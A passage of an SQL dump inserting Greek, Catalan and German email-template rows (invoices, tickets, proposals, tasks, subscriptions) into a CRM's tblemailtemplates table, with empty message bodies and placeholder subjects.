(561, 'invoice', 'invoice-already-send', 'greek', 'Invoice Already Sent to Customer [greek]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(562, 'ticket', 'new-ticket-created-staff', 'greek', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [greek]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(563, 'estimate', 'estimate-send-to-client', 'greek', 'Send Estimate to Customer [greek]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(564, 'ticket', 'ticket-reply-to-admin', 'greek', 'Ticket Reply (Sent to Staff) [greek]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(565, 'estimate', 'estimate-already-send', 'greek', 'Estimate Already Sent to Customer [greek]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(566, 'contract', 'contract-expiration', 'greek', 'Contract Expiration Reminder (Sent to Customer Contacts) [greek]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(567, 'tasks', 'task-assigned', 'greek', 'New Task Assigned (Sent to Staff) [greek]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(568, 'tasks', 'task-added-as-follower', 'greek', 'Staff Member Added as Follower on Task (Sent to Staff) [greek]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(569, 'tasks', 'task-commented', 'greek', 'New Comment on Task (Sent to Staff) [greek]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(570, 'tasks', 'task-added-attachment', 'greek', 'New Attachment(s) on Task (Sent to Staff) [greek]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(571, 'estimate', 'estimate-declined-to-staff', 'greek', 'Estimate Declined (Sent to Staff) [greek]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(572, 'estimate', 'estimate-accepted-to-staff', 'greek', 'Estimate Accepted (Sent to Staff) [greek]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(573, 'proposals', 'proposal-client-accepted', 'greek', 'Customer Action - Accepted (Sent to Staff) [greek]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(574, 'proposals', 'proposal-send-to-customer', 'greek', 'Send Proposal to Customer [greek]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(575, 'proposals', 'proposal-client-declined', 'greek', 'Customer Action - Declined (Sent to Staff) [greek]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(576, 'proposals', 'proposal-client-thank-you', 'greek', 'Thank You Email (Sent to Customer After Accept) [greek]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(577, 'proposals', 'proposal-comment-to-client', 'greek', 'New Comment  (Sent to Customer/Lead) [greek]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(578, 'proposals', 'proposal-comment-to-admin', 'greek', 'New Comment (Sent to Staff)  [greek]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(579, 'estimate', 'estimate-thank-you-to-customer', 'greek', 'Thank You Email (Sent to Customer After Accept) [greek]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(580, 'tasks', 'task-deadline-notification', 'greek', 'Task Deadline Reminder - Sent to Assigned Members [greek]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(581, 'contract', 'send-contract', 'greek', 'Send Contract to Customer [greek]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(582, 'invoice', 'invoice-payment-recorded-to-staff', 'greek', 'Invoice Payment Recorded (Sent to Staff) [greek]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(583, 'ticket', 'auto-close-ticket', 'greek', 'Auto Close Ticket [greek]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(584, 'project', 'new-project-discussion-created-to-staff', 'greek', 'New Project Discussion (Sent to Project Members) [greek]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(585, 'project', 'new-project-discussion-created-to-customer', 'greek', 'New Project Discussion (Sent to Customer Contacts) [greek]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(586, 'project', 'new-project-file-uploaded-to-customer', 'greek', 'New Project File(s) Uploaded (Sent to Customer Contacts) [greek]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(587, 'project', 'new-project-file-uploaded-to-staff', 'greek', 'New Project File(s) Uploaded (Sent to Project Members) [greek]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(588, 'project', 'new-project-discussion-comment-to-customer', 'greek', 'New Discussion Comment  (Sent to Customer Contacts) [greek]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(589, 'project', 'new-project-discussion-comment-to-staff', 'greek', 'New Discussion Comment (Sent to Project Members) [greek]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(590, 'project', 'staff-added-as-project-member', 'greek', 'Staff Added as Project Member [greek]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(591, 'estimate', 'estimate-expiry-reminder', 'greek', 'Estimate Expiration Reminder [greek]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(592, 'proposals', 'proposal-expiry-reminder', 'greek', 'Proposal Expiration Reminder [greek]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(593, 'staff', 'new-staff-created', 'greek', 'New Staff Created (Welcome Email) [greek]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(594, 'client', 'contact-forgot-password', 'greek', 'Forgot Password [greek]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(595, 'client', 'contact-password-reseted', 'greek', 'Password Reset - Confirmation [greek]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(596, 'client', 'contact-set-password', 'greek', 'Set New Password [greek]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(597, 'staff', 'staff-forgot-password', 'greek', 'Forgot Password [greek]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(598, 'staff', 'staff-password-reseted', 'greek', 'Password Reset - Confirmation [greek]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(599, 'project', 'assigned-to-project', 'greek', 'New Project Created (Sent to Customer Contacts) [greek]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(600, 'tasks', 'task-added-attachment-to-contacts', 'greek', 'New Attachment(s) on Task (Sent to Customer Contacts) [greek]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(601, 'tasks', 'task-commented-to-contacts', 'greek', 'New Comment on Task (Sent to Customer Contacts) [greek]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(602, 'leads', 'new-lead-assigned', 'greek', 'New Lead Assigned to Staff Member [greek]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(603, 'client', 'client-statement', 'greek', 'Statement - Account Summary [greek]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(604, 'ticket', 'ticket-assigned-to-admin', 'greek', 'New Ticket Assigned (Sent to Staff) [greek]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(605, 'client', 'new-client-registered-to-admin', 'greek', 'New Customer Registration (Sent to admins) [greek]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(606, 'leads', 'new-web-to-lead-form-submitted', 'greek', 'Web to lead form submitted - Sent to lead [greek]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(607, 'staff', 'two-factor-authentication', 'greek', 'Two Factor Authentication [greek]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(608, 'project', 'project-finished-to-customer', 'greek', 'Project Marked as Finished (Sent to Customer Contacts) [greek]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(609, 'credit_note', 'credit-note-send-to-client', 'greek', 'Send Credit Note To Email [greek]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(610, 'tasks', 'task-status-change-to-staff', 'greek', 'Task Status Changed (Sent to Staff) [greek]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(611, 'tasks', 'task-status-change-to-contacts', 'greek', 'Task Status Changed (Sent to Customer Contacts) [greek]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(612, 'staff', 'reminder-email-staff', 'greek', 'Staff Reminder Email [greek]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(613, 'contract', 'contract-comment-to-client', 'greek', 'New Comment  (Sent to Customer Contacts) [greek]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(614, 'contract', 'contract-comment-to-admin', 'greek', 'New Comment (Sent to Staff)  [greek]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(615, 'subscriptions', 'send-subscription', 'greek', 'Send Subscription to Customer [greek]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(616, 'subscriptions', 'subscription-payment-failed', 'greek', 'Subscription Payment Failed [greek]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(617, 'subscriptions', 'subscription-canceled', 'greek', 'Subscription Canceled (Sent to customer primary contact) [greek]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(618, 'subscriptions', 'subscription-payment-succeeded', 'greek', 'Subscription Payment Succeeded (Sent to customer primary contact) [greek]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(619, 'contract', 'contract-expiration-to-staff', 'greek', 'Contract Expiration Reminder (Sent to Staff) [greek]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(620, 'gdpr', 'gdpr-removal-request', 'greek', 'Removal Request From Contact (Sent to administrators) [greek]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(621, 'gdpr', 'gdpr-removal-request-lead', 'greek', 'Removal Request From Lead (Sent to administrators) [greek]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(622, 'client', 'client-registration-confirmed', 'greek', 'Customer Registration Confirmed [greek]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(623, 'contract', 'contract-signed-to-staff', 'greek', 'Contract Signed (Sent to Staff) [greek]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(624, 'subscriptions', 'customer-subscribed-to-staff', 'greek', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [greek]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(625, 'client', 'contact-verification-email', 'greek', 'Email Verification (Sent to Contact After Registration) [greek]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(626, 'client', 'new-customer-profile-file-uploaded-to-staff', 'greek', 'New Customer Profile File(s) Uploaded (Sent to Staff) [greek]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(627, 'staff', 'event-notification-to-staff', 'greek', 'Event Notification (Calendar) [greek]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(628, 'subscriptions', 'subscription-payment-requires-action', 'greek', 'Credit Card Authorization Required - SCA [greek]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(629, 'invoice', 'invoice-due-notice', 'greek', 'Invoice Due Notice [greek]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(630, 'estimate_request', 'estimate-request-submitted-to-staff', 'greek', 'Estimate Request Submitted (Sent to Staff) [greek]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(631, 'estimate_request', 'estimate-request-assigned', 'greek', 'Estimate Request Assigned (Sent to Staff) [greek]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(632, 'estimate_request', 'estimate-request-received-to-user', 'greek', 'Estimate Request Received (Sent to User) [greek]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(633, 'client', 'new-client-created', 'catalan', 'New Contact Added/Registered (Welcome Email) [catalan]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(634, 'invoice', 'invoice-send-to-client', 'catalan', 'Send Invoice to Customer [catalan]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(635, 'ticket', 'new-ticket-opened-admin', 'catalan', 'New Ticket Opened (Opened by Staff, Sent to Customer) [catalan]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(636, 'ticket', 'ticket-reply', 'catalan', 'Ticket Reply (Sent to Customer) [catalan]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(637, 'ticket', 'ticket-autoresponse', 'catalan', 'New Ticket Opened - Autoresponse [catalan]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(638, 'invoice', 'invoice-payment-recorded', 'catalan', 'Invoice Payment Recorded (Sent to Customer) [catalan]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(639, 'invoice', 'invoice-overdue-notice', 'catalan', 'Invoice Overdue Notice [catalan]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(640, 'invoice', 'invoice-already-send', 'catalan', 'Invoice Already Sent to Customer [catalan]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(641, 'ticket', 'new-ticket-created-staff', 'catalan', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [catalan]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(642, 'estimate', 'estimate-send-to-client', 'catalan', 'Send Estimate to Customer [catalan]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(643, 'ticket', 'ticket-reply-to-admin', 'catalan', 'Ticket Reply (Sent to Staff) [catalan]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(644, 'estimate', 'estimate-already-send', 'catalan', 'Estimate Already Sent to Customer [catalan]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(645, 'contract', 'contract-expiration', 'catalan', 'Contract Expiration Reminder (Sent to Customer Contacts) [catalan]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(646, 'tasks', 'task-assigned', 'catalan', 'New Task Assigned (Sent to Staff) [catalan]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(647, 'tasks', 'task-added-as-follower', 'catalan', 'Staff Member Added as Follower on Task (Sent to Staff) [catalan]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(648, 'tasks', 'task-commented', 'catalan', 'New Comment on Task (Sent to Staff) [catalan]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(649, 'tasks', 'task-added-attachment', 'catalan', 'New Attachment(s) on Task (Sent to Staff) [catalan]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(650, 'estimate', 'estimate-declined-to-staff', 'catalan', 'Estimate Declined (Sent to Staff) [catalan]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(651, 'estimate', 'estimate-accepted-to-staff', 'catalan', 'Estimate Accepted (Sent to Staff) [catalan]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(652, 'proposals', 'proposal-client-accepted', 'catalan', 'Customer Action - Accepted (Sent to Staff) [catalan]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(653, 'proposals', 'proposal-send-to-customer', 'catalan', 'Send Proposal to Customer [catalan]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(654, 'proposals', 'proposal-client-declined', 'catalan', 'Customer Action - Declined (Sent to Staff) [catalan]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(655, 'proposals', 'proposal-client-thank-you', 'catalan', 'Thank You Email (Sent to Customer After Accept) [catalan]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(656, 'proposals', 'proposal-comment-to-client', 'catalan', 'New Comment  (Sent to Customer/Lead) [catalan]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(657, 'proposals', 'proposal-comment-to-admin', 'catalan', 'New Comment (Sent to Staff)  [catalan]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(658, 'estimate', 'estimate-thank-you-to-customer', 'catalan', 'Thank You Email (Sent to Customer After Accept) [catalan]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(659, 'tasks', 'task-deadline-notification', 'catalan', 'Task Deadline Reminder - Sent to Assigned Members [catalan]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(660, 'contract', 'send-contract', 'catalan', 'Send Contract to Customer [catalan]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(661, 'invoice', 'invoice-payment-recorded-to-staff', 'catalan', 'Invoice Payment Recorded (Sent to Staff) [catalan]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(662, 'ticket', 'auto-close-ticket', 'catalan', 'Auto Close Ticket [catalan]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(663, 'project', 'new-project-discussion-created-to-staff', 'catalan', 'New Project Discussion (Sent to Project Members) [catalan]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(664, 'project', 'new-project-discussion-created-to-customer', 'catalan', 'New Project Discussion (Sent to Customer Contacts) [catalan]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(665, 'project', 'new-project-file-uploaded-to-customer', 'catalan', 'New Project File(s) Uploaded (Sent to Customer Contacts) [catalan]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(666, 'project', 'new-project-file-uploaded-to-staff', 'catalan', 'New Project File(s) Uploaded (Sent to Project Members) [catalan]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(667, 'project', 'new-project-discussion-comment-to-customer', 'catalan', 'New Discussion Comment  (Sent to Customer Contacts) [catalan]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(668, 'project', 'new-project-discussion-comment-to-staff', 'catalan', 'New Discussion Comment (Sent to Project Members) [catalan]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(669, 'project', 'staff-added-as-project-member', 'catalan', 'Staff Added as Project Member [catalan]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(670, 'estimate', 'estimate-expiry-reminder', 'catalan', 'Estimate Expiration Reminder [catalan]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(671, 'proposals', 'proposal-expiry-reminder', 'catalan', 'Proposal Expiration Reminder [catalan]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(672, 'staff', 'new-staff-created', 'catalan', 'New Staff Created (Welcome Email) [catalan]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(673, 'client', 'contact-forgot-password', 'catalan', 'Forgot Password [catalan]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(674, 'client', 'contact-password-reseted', 'catalan', 'Password Reset - Confirmation [catalan]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(675, 'client', 'contact-set-password', 'catalan', 'Set New Password [catalan]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(676, 'staff', 'staff-forgot-password', 'catalan', 'Forgot Password [catalan]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(677, 'staff', 'staff-password-reseted', 'catalan', 'Password Reset - Confirmation [catalan]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(678, 'project', 'assigned-to-project', 'catalan', 'New Project Created (Sent to Customer Contacts) [catalan]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(679, 'tasks', 'task-added-attachment-to-contacts', 'catalan', 'New Attachment(s) on Task (Sent to Customer Contacts) [catalan]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(680, 'tasks', 'task-commented-to-contacts', 'catalan', 'New Comment on Task (Sent to Customer Contacts) [catalan]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(681, 'leads', 'new-lead-assigned', 'catalan', 'New Lead Assigned to Staff Member [catalan]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(682, 'client', 'client-statement', 'catalan', 'Statement - Account Summary [catalan]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(683, 'ticket', 'ticket-assigned-to-admin', 'catalan', 'New Ticket Assigned (Sent to Staff) [catalan]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(684, 'client', 'new-client-registered-to-admin', 'catalan', 'New Customer Registration (Sent to admins) [catalan]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(685, 'leads', 'new-web-to-lead-form-submitted', 'catalan', 'Web to lead form submitted - Sent to lead [catalan]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(686, 'staff', 'two-factor-authentication', 'catalan', 'Two Factor Authentication [catalan]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(687, 'project', 'project-finished-to-customer', 'catalan', 'Project Marked as Finished (Sent to Customer Contacts) [catalan]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(688, 'credit_note', 'credit-note-send-to-client', 'catalan', 'Send Credit Note To Email [catalan]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(689, 'tasks', 'task-status-change-to-staff', 'catalan', 'Task Status Changed (Sent to Staff) [catalan]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(690, 'tasks', 'task-status-change-to-contacts', 'catalan', 'Task Status Changed (Sent to Customer Contacts) [catalan]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(691, 'staff', 'reminder-email-staff', 'catalan', 'Staff Reminder Email [catalan]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(692, 'contract', 'contract-comment-to-client', 'catalan', 'New Comment  (Sent to Customer Contacts) [catalan]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(693, 'contract', 'contract-comment-to-admin', 'catalan', 'New Comment (Sent to Staff)  [catalan]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(694, 'subscriptions', 'send-subscription', 'catalan', 'Send Subscription to Customer [catalan]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(695, 'subscriptions', 'subscription-payment-failed', 'catalan', 'Subscription Payment Failed [catalan]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(696, 'subscriptions', 'subscription-canceled', 'catalan', 'Subscription Canceled (Sent to customer primary contact) [catalan]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(697, 'subscriptions', 'subscription-payment-succeeded', 'catalan', 'Subscription Payment Succeeded (Sent to customer primary contact) [catalan]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(698, 'contract', 'contract-expiration-to-staff', 'catalan', 'Contract Expiration Reminder (Sent to Staff) [catalan]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(699, 'gdpr', 'gdpr-removal-request', 'catalan', 'Removal Request From Contact (Sent to administrators) [catalan]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(700, 'gdpr', 'gdpr-removal-request-lead', 'catalan', 'Removal Request From Lead (Sent to administrators) [catalan]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(701, 'client', 'client-registration-confirmed', 'catalan', 'Customer Registration Confirmed [catalan]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(702, 'contract', 'contract-signed-to-staff', 'catalan', 'Contract Signed (Sent to Staff) [catalan]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(703, 'subscriptions', 'customer-subscribed-to-staff', 'catalan', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [catalan]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(704, 'client', 'contact-verification-email', 'catalan', 'Email Verification (Sent to Contact After Registration) [catalan]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(705, 'client', 'new-customer-profile-file-uploaded-to-staff', 'catalan', 'New Customer Profile File(s) Uploaded (Sent to Staff) [catalan]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(706, 'staff', 'event-notification-to-staff', 'catalan', 'Event Notification (Calendar) [catalan]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(707, 'subscriptions', 'subscription-payment-requires-action', 'catalan', 'Credit Card Authorization Required - SCA [catalan]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(708, 'invoice', 'invoice-due-notice', 'catalan', 'Invoice Due Notice [catalan]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(709, 'estimate_request', 'estimate-request-submitted-to-staff', 'catalan', 'Estimate Request Submitted (Sent to Staff) [catalan]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(710, 'estimate_request', 'estimate-request-assigned', 'catalan', 'Estimate Request Assigned (Sent to Staff) [catalan]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(711, 'estimate_request', 'estimate-request-received-to-user', 'catalan', 'Estimate Request Received (Sent to User) [catalan]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(712, 'client', 'new-client-created', 'german', 'New Contact Added/Registered (Welcome Email) [german]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(713, 'invoice', 'invoice-send-to-client', 'german', 'Send Invoice to Customer [german]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(714, 'ticket', 'new-ticket-opened-admin', 'german', 'New Ticket Opened (Opened by Staff, Sent to Customer) [german]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(715, 'ticket', 'ticket-reply', 'german', 'Ticket Reply (Sent to Customer) [german]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(716, 'ticket', 'ticket-autoresponse', 'german', 'New Ticket Opened - Autoresponse [german]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(717, 'invoice', 'invoice-payment-recorded', 'german', 'Invoice Payment Recorded (Sent to Customer) [german]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(718, 'invoice', 'invoice-overdue-notice', 'german', 'Invoice Overdue Notice [german]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(719, 'invoice', 'invoice-already-send', 'german', 'Invoice Already Sent to Customer [german]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(720, 'ticket', 'new-ticket-created-staff', 'german', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [german]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(721, 'estimate', 'estimate-send-to-client', 'german', 'Send Estimate to Customer [german]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(722, 'ticket', 'ticket-reply-to-admin', 'german', 'Ticket Reply (Sent to Staff) [german]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(723, 'estimate', 'estimate-already-send', 'german', 'Estimate Already Sent to Customer [german]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(724, 'contract', 'contract-expiration', 'german', 'Contract Expiration Reminder (Sent to Customer Contacts) [german]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
